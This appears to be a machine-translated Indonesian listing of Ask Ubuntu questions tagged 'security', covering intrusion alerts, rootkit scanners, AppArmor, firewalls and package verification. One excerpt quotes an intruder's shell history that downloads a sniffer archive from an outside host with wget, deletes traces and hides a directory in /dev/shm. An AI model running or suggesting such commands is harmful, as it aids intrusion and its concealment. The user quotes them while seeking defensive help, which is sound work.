Pertanyaan yang diberi tag «security»

Saya sudah menggunakan Linux cukup lama sekarang dan saya selalu merasa perlu memiliki pengaturan perangkat lunak / skrip pasif yang dapat mengingatkan saya tentang segala kegiatan jaringan yang mencurigakan seperti pemindaian, upaya login yang gagal, dll dengan cepat melalui email atau dengan pemberitahuan visual / audio. Saya tahu bagaimana mencari …

27 software-recommendation  security  firewall  logs 

Tidak dapat menemukan penyedia VPN gratis untuk Ubuntu. Saya mencoba melihat ke pertanyaan lama tetapi tampaknya sudah ketinggalan zaman.

27 security  vpn  privacy 

Saya baru-baru ini mengakuisisi Yubikey Neo - perangkat otentikasi faktor kedua yang bagus. Ini terutama dimaksudkan untuk digunakan dengan One Time Passwords, dan protokol U2F yang muncul - tetapi karena Yubikey versi 2 juga mendukung otentikasi respon-respons HMAC-SHA1. HMAC-SHA1 menggabungkan kunci rahasia (disimpan di dalam Yubikey) dan menggabungkan ini dengan …

27 password  security  encryption  luks  yubikey 

Kebijakan perusahaan saya mengatakan bahwa kotak Linux harus diamankan dengan SELinux (sehingga auditor keamanan dapat memeriksa kotak centang 'ya, kami sangat aman!' Untuk setiap server). Saya berharap untuk mengambil keuntungan dari keamanan AppArmor default Ubuntu yang mengagumkan. Apakah tidak bijaksana menjalankan Apparmor dan SELinux? (Jika demikian, bisakah ide buruk ini …

27 security  permissions  apparmor 

Saya 99,9% yakin bahwa sistem saya di komputer pribadi saya telah disusupi. Izinkan saya untuk memberikan alasan saya terlebih dahulu sehingga situasinya akan menjadi jelas: Garis waktu kasar dari aktivitas mencurigakan dan tindakan selanjutnya yang diambil: 4-26 23:00 Saya mengakhiri semua program dan menutup laptop saya. 4-27 12:00 Saya membuka …

25 ssh  security  passwd-file 

Memindai dengan chkrootkit menunjukkan "tcpd" sebagai INFEKSI. Meskipun pemindaian oleh rkhunter menunjukkan ok, (kecuali untuk false positive) Haruskah saya khawatir? (Saya di Ubuntu 16.10 dengan 4.8.0-37-generik)

25 security  malware  rootkit  tcpdump  chkrootkit 

Saya tahu bahwa kata sandi sudo melindungi komputer saya dari peretasan lokal oleh seseorang yang memiliki akses fisik ke sana ( edit: sebenarnya, tidak ). Kata sandi saya cukup kuat untuk tujuan itu, tetapi saya tahu itu tidak cukup kuat jika seseorang dapat dengan paksa memaksakannya dari jarak jauh. Can …

25 password  sudo  security 

Seperti 99% pengguna, saya menginstal Ubuntu dari binari yang sudah jadi. Bagaimana saya bisa memverifikasi diri saya bahwa binari itu sebenarnya dari kode sumber asli dari Ubuntu? Akan lebih baik untuk memverifikasi bahwa NSA / seseorang belum berkolaborasi dengan Ubuntu atau Linode (penyedia VPS saya) untuk mengacaukan binari. Jika kita …

25 security 

Apakah Ubuntu dilengkapi dengan firewall yang sudah diinstal atau otomatis? Jika tidak, apakah saya memerlukannya? Saya telah membaca beberapa artikel tentang kelebihan Linux dibandingkan sistem operasi lain tentang keamanan (tidak perlu memiliki antivirus, ...) tetapi ingin memastikan.

25 security  firewall 

Saya menjalankan Ubuntu 10.04.1 LTS. Saya menjalankan rkhunter untuk memeriksa rootkit. rkhunter mengeluh tentang file dan direktori tersembunyi berikut. Saya pikir file-file ini bukan masalah nyata pada sistem saya, tetapi bagaimana saya bisa memeriksa untuk melihat apakah file-file ini adalah file yang sah? [07:57:45] Checking for hidden files and directories …

25 10.04  security  rkhunter 

Kemarin saya memeriksa histori perintah saya pada VServer saya. Saya menemukan beberapa garis yang mencurigakan. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " …

24 ssh  security  malware 

Saya mencoba memahami do-release-upgradeprosesnya yaitu cara Ubuntu meminta saya untuk meningkatkan ke rilis Ubuntu musim semi atau musim gugur berikutnya. Setelah membaca sumber untuk ubuntu-release-upgradersaya menemukan file / etc / update-manager / rilis-meta di sistem saya. File ini muncul menggunakan URL HTTP untuk menunjuk ke http://changelogs.ubuntu.com/meta-release di mana berbagai rilis …

24 security  do-release-upgrade 

Beberapa pertanyaan yang ingin saya jawab dalam jawabannya: Bagaimana saya tahu jika apparmor sedang berjalan? Bagaimana saya bisa tahu apakah itu berfungsi dengan baik?

24 security  apparmor 

Saya mengerti bahwa jika ada malware yang masuk ke sistem Linux, ia akan, paling banyak, mendapatkan hak istimewa tingkat pengguna dan merusak apa pun dalam jangkauan pengguna tertentu, yaitu file milik pengguna. Tapi apa sebenarnya yang mencegah malwares mendapatkan akses tingkat root? Bisakah itu entah bagaimana memecahkan kata sandi dari …

24 security 

Pada sistem RedHat / CentOS, saya dapat memverifikasi RPM yang diinstal pada sistem saya menggunakan rpm -V . Apa Ubuntu atau aptsetara dengan perintah ini?

24 security  apt  rpm  deb